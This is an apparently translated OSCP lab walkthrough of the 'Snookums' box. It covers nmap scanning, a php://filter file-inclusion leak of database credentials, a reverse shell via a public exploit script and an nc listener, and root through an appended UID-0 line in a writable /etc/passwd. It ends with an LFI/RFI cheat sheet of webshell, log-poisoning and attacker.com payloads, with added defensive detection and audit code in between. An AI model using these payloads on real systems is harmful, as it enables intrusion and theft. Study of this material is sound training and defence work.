OSCP Official Lab: Snookums Walkthrough
Follow the 泷羽Sec and 泷羽Sec-静安 WeChat accounts for regularly updated articles on OSCP, penetration testing and related topics that help you keep up with the security field. Reply "OSCP配套工具" to the account to get the tools used in this article.
Open the lab from the official site.

Information gathering
# Kali attacker address
192.168.45.238
# Target address
192.168.236.58
Scan ports and directories
# Set the MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Port scan
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.58 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service scan
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
# Directory scan
gobuster dir -e -u http://192.168.236.58 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.236.58/
The scan results are as follows:
┌──(kali㉿kali)-[~/Desktop]
└─$ echo $ports
21,22,80,111,139,445,3306
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:01 EDT
Nmap scan report for 192.168.236.58
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Simple PHP Photo Gallery
111/tcp open rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp open mysql MySQL (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|5.X (97%), MikroTik RouterOS 7.X (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (91%), Linux 3.8 - 3.16 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 - 5.19 (91%), Linux 5.0 - 5.14 (91%), Linux 2.6.32 - 3.10 (90%), Linux 4.15 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SNOOKUMS; OS: Unix
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:06 EDT
Nmap scan report for 192.168.236.58
Host is up (1.5s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.236.58:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.236.58:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /README.txt: Interesting, a readme.
| /css/: Potentially interesting folder w/ directory listing
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting folder w/ directory listing
|_ /js/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
Host script results:
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
Nmap done: 1 IP address (1 host up) scanned in 266.35 seconds
http://192.168.236.58/index.php (Status: 200) [Size: 2730]
http://192.168.236.58/images (Status: 301) [Size: 237] [--> http://192.168.236.58/images/]
http://192.168.236.58/image.php (Status: 200) [Size: 1508]
http://192.168.236.58/photos (Status: 301) [Size: 237] [--> http://192.168.236.58/photos/]
http://192.168.236.58/css (Status: 301) [Size: 234] [--> http://192.168.236.58/css/]
http://192.168.236.58/license.txt (Status: 200) [Size: 18511]
http://192.168.236.58/db.php (Status: 200) [Size: 0]
http://192.168.236.58/README.txt (Status: 200) [Size: 4041]
http://192.168.236.58/js (Status: 301) [Size: 233] [--> http://192.168.236.58/js/]
┌──(kali㉿kali)-[~/Desktop]
└─$ whatweb http://192.168.236.58/
http://192.168.236.58/ [200 OK] Apache[2.4.6], Country[RESERVED][ZZ], Google-Analytics[UA-2196019-1], HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.236.58], JQuery[1.7.2], Lightbox, PHP[5.4.16], Script, Title[Simple PHP Photo Gallery], X-Powered-By[PHP/5.4.16]
Port 80 serves a photo gallery. Hovering over an image shows its URL in the bottom-right corner, which reveals an image folder.
Nothing notable was found in that folder.
The Nmap results include a README.txt file, so read it:

==========================
Simple PHP Photo Gallery
==========================
Copyright John Caruso 2005-2008
https://sourceforge.net/projects/simplephpgal/
A) Embedded Gallery or Standalone
==================================
You can embed the gallery into existing pages or use it as a standalone page.
To use it as a Standalone page, just follow the instructions in steps (B) and (C).
To use it as an embedded Gallery in an existing page:
1) Copy the code from the embeddedGallery.php file (or just use an include("embeddedGallery.php") statement in your existing php file).
2) Follow step (B) with the following modifications
* B.1) The gallery title will not be taken from the folder name, but rather the config file. Make sure to uncomment the $galleryTitle = "title"; line and place your desired title in the quotes.
* B.2) Do not include index.php when copying the files from the .zip file
* C.2) Do not include index.php if you want to create your own index page. Just include the embeddedGallery.php file in your own script
B) Steps to setup your photogallery.
====================================
1) Create a new folder with the name that you would like your gallery title to be.
* use the underscore "_" for spaces (eg. My_Vacation)
* you can only use characters that are allowable for folder names
2) Put all the files contained in this .zip file into the folder you just created
3) If they do not already exist, create two folders named 'phpGallery_thumbs' and 'phpGallery_images' inside your folder. You will need WRITE permissions on the phpGallery_thumbs directory.
4) Put all of the photos that you want displayed in your gallery into the phpGallery_images folder
* by default they will be displayed in alphabetical order. This can be modified in the phpGalleryConfig.php file by setting the $sortMode variable at the bottom of the file
5) Upload your directory to your website.
* The first time you view the gallery it will take some time to load because thumbnails are being generated (If the page times out and nothing is shown on the screen, refresh the page. You may need to do this several times if you have a lot of images)
C) For Multiple Photo Galleries
================================
If you want to create multiple photo galleries:
1) Create a folder with the name that you would like your gallery listing to have.
* use the underscore "_" for spaces (eg. My_Galleries)
* you can only use characters that are allowable for folder names
2) Place the index.php, embeddedGallery.php and phpGalleryConfig.php files from this .zip file into the folder
3) Do the steps in (A) for as many galleries as you want to display, and place them into the folder you created in the previous step
D) Modifying the Style
=======================
Every element in the gallery script is attached to a CSS class.
If you are using the gallery as an embedded gallery, copy and paste the CSS classes/elements from the phpGalleryStyle.css file and paste them into your current stylesheet. I have tried to make the names as unique as possible.
If you are using the gallery as a standalone page, you can make your modifications directly to the phpGalleryStyle.css file.
NOTE:
i) Your webserver must have PHP version 3.0 or higher, and GD 2.0 or higher installed in order for the gallery software to work.
To check this, create a php file with the line <?php phpinfo(); ?> and run it to see what modules are installed.
ii) Should work for JPG, JPEG, PNG and GIF files (for both upper and lowercase file extensions)
iii) Feel free to remove the copyright information (I agree it is quite ugly), under the condition that you aren't going to try to break what the copyright is intended to protect :)
iv) Have fun and enjoy!
Oh and if you don't mind, drop me a line at simplephpgallery@gmail.com with the URL to your website that you are using the gallery script on. I enjoy seeing how something I've done has helped out someone else!
This PHP gallery uses include to display images: the README sentence "or just use an include("embeddedGallery.php") statement in your existing php file" indicates that file inclusion is in play. Searching online for how such a file inclusion is exploited gives the following.
[!question] What can a file inclusion vulnerability be used for?
File inclusion vulnerability
http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd

http://192.168.236.58/image.php?img=php://filter/convert.base64-encode/resource=/var/www/html/db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>
This gives the database username and password. Port 3306 is open, but an attempt to log in shows that connections from external addresses are not permitted.
[!success] Database credentials: root / MalapropDoffUtilize1337
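As an added example (not part of the original writeup), a small Python detector a defender could run over Apache access logs to spot the kind of request used above against image.php. The log lines are constructed for the example; the first mirrors the php://filter request, the others cover traversal variants from the LFI notes at the end of this post.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache access-log lines (not taken from the target). The first
# mirrors the php://filter request used against image.php in this writeup.
SAMPLE_LOG = """\
192.168.45.238 - - [20/Aug/2025:11:52:10 -0400] "GET /image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 1843
192.168.45.238 - - [20/Aug/2025:11:53:02 -0400] "GET /image.php?img=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
192.168.45.238 - - [20/Aug/2025:11:54:40 -0400] "GET /image.php?img=....//....//etc/passwd%00 HTTP/1.1" 200 1843
10.0.0.7 - - [20/Aug/2025:11:55:01 -0400] "GET /image.php?img=photos/beach.jpg HTTP/1.1" 200 51230
10.0.0.8 - - [20/Aug/2025:11:56:13 -0400] "GET /index.php HTTP/1.1" 200 2730
"""

# Indicators taken from the wrappers and bypass tricks discussed on this page.
INDICATORS = [
    ("stream wrapper", re.compile(r"\b(php|data|zip|phar|file)://", re.I)),
    ("remote include", re.compile(r"=(https?|ftp)://", re.I)),
    ("path traversal", re.compile(r"\.\./|\.\.\\")),
    ("null byte", re.compile("\x00")),
    ("environ or log file", re.compile(r"/proc/self/environ|/var/log/", re.I)),
]

# Common Log Format: ip ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def normalise(value: str) -> str:
    """Decode URL encoding twice so %252e%252e%252f and %2e%2e%2f both become ../."""
    return unquote(unquote(value))

def scan_log(text: str):
    """Return [(ip, target, [reasons])] for requests whose query shows LFI indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Only the query string is inspected; the path itself is the gallery's own.
        query = normalise(urlsplit(m["target"]).query)
        reasons = [name for name, rx in INDICATORS if rx.search(query)]
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(reasons)}")
```

On a real host, feed it /var/log/httpd/access_log and alert on any hit from an address that is not a known scanner.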

Simple PHP Photo Gallery vulnerability
The Whatweb output shows the site is built on the Simple PHP Photo Gallery framework; searching for related vulnerabilities turns up a script that exploits it.
# Terminal 1
rlwrap -cAr nc -nlvp 445
# Terminal 2
git clone https://github.com/beauknowstech/SimplePHPGal-RCE.py.git
cd SimplePHPGal-RCE.py
python3 SimplePHPGal-RCE.py http://192.168.236.58/ 192.168.45.238 445
python -c 'import pty;pty.spawn("/bin/bash")'
Note: for the listener it is best to use a port the target itself already has open, such as 445 here.

Internal information gathering
The database can now be logged into.

Decoding each password twice gives:
| username | password | first decode | second decode |
|---|---|---|---|
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= | TW9iaWxpemVIaXNzU2VlZHRpbWU3NDc= | MobilizeHissSeedtime747 |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== | SG9ja1N5ZG5leUNlcnRpZnkxMjM= | HockSydneyCertify123 |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== | T3ZlcmFsbENyZXN0TGVhbjAwMA== | OverallCrestLean000 |
The home folder contains only one user directory, michael, so try su to that user with the passwords obtained from the database.
This yields the first flag.
A search for common privilege escalation vectors turned up nothing.
While checking for other usable users, the passwd file turned out to be writable by the current user michael, so simply append a new user with administrator (root) privileges.

echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
su root2
This yields the second flag.
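An added example, not from the writeup: a Python audit that catches exactly this misconfiguration, a passwd file with loose write permissions and an appended UID-0 account with an empty password field. The sample passwd content is constructed for the example, with the appended root2 line from above as its last entry.

```python
import stat

# Constructed /etc/passwd content; the last line is the entry appended in this
# writeup (root2::0:0::/root:/bin/bash) and is what the audit should flag.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
michael:x:1000:1000::/home/michael:/bin/bash
root2::0:0::/root:/bin/bash
"""

def audit_passwd(content: str):
    """Return (lineno, name, issue) for UID-0 accounts other than root and for
    empty password fields.

    An empty second field means "no password required"; combined with uid 0 it
    is a ready-made root login. 'x' means the hash lives in /etc/shadow.
    """
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((lineno, name, "extra uid 0 account"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
    return findings

def audit_mode(mode: int):
    """Flag a passwd file mode that lets group or others write; expected is 0644."""
    issues = []
    if mode & stat.S_IWGRP:
        issues.append("group-writable")
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    return issues

if __name__ == "__main__":
    import os
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("passwd entry:", finding)
    # On a live host, check the real file's mode bits as well.
    if os.path.exists("/etc/passwd"):
        print("mode issues:", audit_mode(os.stat("/etc/passwd").st_mode))
```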

Summary
Intrusion path diagram
flowchart TD
%% Asset list
A[Kali attacker <br> 192.168.45.238]
B[Target <br> 192.168.236.58]
C[Obtain database password]
D[Obtain apache shell]
E[Obtain password of user michael and log in]
F[root]
%% Path relations
A-->|scan|B
B-->|file inclusion vulnerability|C
B-->|SimplePHPGal vulnerability|D
C-->|decode database passwords|E
D-->E
E-->|/etc/passwd permission misconfiguration|F
%% Line types: ---(solid), -.->(dashed), ==>(thick arrow)
%% -->|yes|: link with condition text
%% Rectangle node [ ], diamond decision node { }, rounded node ( )
%% Style definitions
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% Line type and colour scheme (works for light and dark themes)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% Apply styles
class A attack;
class B,C,D public;
class E,F internal;
Intrusion timeline
gantt
title Attack timeline
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section Reconnaissance
Target scanning :a1, 2025-08-20 11:4, 2025-08-20 12:30
Vulnerability identification :a2, after a1, 2025-08-20 13:03
section Attack
Initial access :b1, after a2, 2025-08-20 13:20
Privilege escalation :crit,b2, after b1, 3m
section Post-exploitation
Data exfiltration :c1, after b2, 1m
File inclusion vulnerabilities (LFI/RFI)
The core of a file inclusion vulnerability (LFI/RFI) is abusing a dynamic file-loading mechanism: by controlling the include path parameter, an attacker reads sensitive files or executes malicious code. Common exploitation techniques and their details, grouped by protocol and scenario:
📁 I. Basic local file inclusion (LFI)
- Reading sensitive files
  - Path traversal: use ../ to move up directories and read system files. ?file=../../../../etc/passwd leaks user account information.
  - Windows: ?file=../../Windows/win.ini reads system configuration.
  - Null-byte truncation (PHP < 5.3.4): ?file=../../../etc/passwd%00 bypasses an appended suffix (such as .php).
- Log file injection
  - Poison the log: inject code via a request header (e.g. User-Agent: <?php system($_GET['cmd']);?>).
  - Include the log: ?file=/var/log/apache2/access.log&cmd=id executes the injected code.
- Session file abuse
  - Inject a malicious session: set PHPSESSID=evil through the login form and submit username=<?php system('id');?>.
  - Include the session file: ?file=/tmp/sess_evil executes the code.
🌐 II. Advanced use of PHP stream wrappers
🔧 1. php://filter (source disclosure)
- Base64-encoded read: avoids the PHP code being executed directly. ?file=php://filter/convert.base64-encode/resource=config.php returns the configuration file's contents Base64-encoded.
- Encoding bypass tricks:
  - Chained filters: ?file=php://filter/convert.iconv.UTF-8.UTF-16/resource=index.php bypasses simple filters.
⚡ 2. php://input (code execution)
- Execute code via a POST request: requires allow_url_include=On. ?file=php://input with the POST body <?php system('id');?> runs system commands directly.
- Write a webshell: the include triggers the write. <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);?>'); ?>
📦 3. Archive wrappers (bypassing upload restrictions)
- Upload shell.zip (containing shell.php) renamed to image.jpg. ?file=zip:///path/to/image.jpg%23shell.php extracts and executes the code.
- phar://: similar to zip://, and additionally supports deserialization attacks.
💥 4. data:// (direct code execution)
- Embedded PHP code: requires allow_url_include=On. ?file=data://text/plain,<?php phpinfo();?> outputs phpinfo directly.
- Base64-encoded bypass: ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+ executes the encoded code.
🎯 III. Remote file inclusion (RFI)
- Load a remote malicious file: ?file=http://attacker.com/shell.txt includes a webshell hosted on a remote server (requires allow_url_include=On).
  - Bypass trick: append ? or %23 to cut off the suffix: ?file=http://attacker.com/shell.txt%23 ignores a locally appended suffix (such as .php).
- Combine with DNS rebinding: make the same URL resolve to the attacker's server at one moment and to a local file at another, bypassing IP restrictions.
⚙️ IV. Environment variables and temporary files
- /proc/self/environ: inject code via User-Agent: <?php system($_GET['cmd']);?>, then ?file=/proc/self/environ&cmd=id executes the injected command.
- Temporary file inclusion: combined with a file upload vulnerability, include the uploaded temporary file path (e.g. /tmp/phpXXXXXX).
🛠️ V. Filter bypass techniques
- Double-write bypass: ?file=....//....//etc/passwd defeats a str_replace("../", "") filter.
- Absolute path bypass: ?file=file:///etc/passwd specifies the absolute path directly.
- Length truncation: over-long file names (Windows > 256 characters, Linux > 4096 characters) have their suffix truncated automatically.
💎 Summary
Exploiting a file inclusion vulnerability comes down to controlling the input path and abusing protocol features:
- Sensitive information disclosure → php://filter + Base64 encoding.
- Code execution → php://input / data:// + POST code injection.
- Bypassing restrictions → archive wrappers (zip:// / phar://) or path traversal tricks.
Defence needs a combination of allowlist validation, disabling wrappers (e.g. allow_url_include=Off) and input filtering.
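An added Python example (the gallery itself is PHP; this models the check and is not the project's code) contrasting the str_replace("../", "") style filter from the bypass section with the allowlist validation the summary recommends. WEB_ROOT, IMAGE_DIR and the file names are assumptions made for the example.

```python
import posixpath
import re

# Constructed layout for the example: the web root and the folder the gallery
# is allowed to serve images from (assumptions, not the target's real paths).
WEB_ROOT = "/var/www/html"
IMAGE_DIR = posixpath.join(WEB_ROOT, "photos")
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# Anything that looks like scheme: (php://, data://, zip://, phar://, http://)
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)

def naive_filter(img: str) -> str:
    """The str_replace('../', '') style filter from the bypass section, for comparison.

    One non-recursive pass leaves '../' behind when the input was '....//'.
    """
    return img.replace("../", "")

def resolve_image(img: str):
    """Hardened resolution: reject stream wrappers and null bytes, normalise the
    path, and require it to stay inside IMAGE_DIR with an allowlisted extension.
    Returns the absolute path, or None when the request must be refused."""
    if "\x00" in img or WRAPPER_RE.match(img):
        return None
    # normpath collapses '..' and '//' lexically; on a live host also apply
    # os.path.realpath so a symlink inside IMAGE_DIR cannot point outside it.
    # An absolute img makes join() discard IMAGE_DIR, which the prefix check catches.
    candidate = posixpath.normpath(posixpath.join(IMAGE_DIR, img))
    if posixpath.commonpath([IMAGE_DIR, candidate]) != IMAGE_DIR:
        return None
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        return None
    return candidate

if __name__ == "__main__":
    for probe in ["beach.jpg", "../../../etc/passwd", "....//....//etc/passwd",
                  "php://filter/convert.base64-encode/resource=/etc/passwd"]:
        print(f"{probe!r}: naive -> {naive_filter(probe)!r}, hardened -> {resolve_image(probe)}")
```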